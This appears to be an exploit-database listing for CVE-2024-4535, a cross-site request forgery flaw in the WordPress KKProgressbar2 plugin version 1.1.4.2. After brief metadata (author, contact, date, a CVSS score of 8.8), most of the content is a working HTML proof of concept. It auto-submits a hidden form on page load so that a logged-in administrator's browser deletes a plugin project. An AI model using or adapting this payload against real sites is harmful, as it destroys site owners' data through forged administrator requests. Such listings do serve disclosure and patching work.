Exploit for 📄 WordPress KKProgressbar2 1.1.4.2 Cross Site Request Forgery CVE-2024-4535

Name: Exploit for 📄 WordPress KKProgressbar2 1.1.4.2 Cross Site Request Forgery CVE-2024-4535
Rating: 5 (130 reviews)

2025-10-06 | CVSS 8.8

## https://sploitus.com/exploit?id=PACKETSTORM:210192
# Exploit Title: WordPress Plugin KKProgressbar2 - Cross-Site Request
    Forgery (CSRF)
    # Date: 2025-10-05
    # Exploit Author: Milad Karimi (Ex3ptionaL)
    # Contact: miladgrayhat@gmail.com
    # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # Tested on: Win, Ubuntu
    # CVE : CVE-2024-4535
    
                                  POC:
    
    <body onload="document.forms[0].submit()">
        <form action="http:// target.com/wp-admin/admin.php?page=kkpb-menu"
    method="post">
            <input type="hidden" name="action" value="delete-project">
            <input type="hidden" name="id" value="<<ID>>">
        </form>
    </body>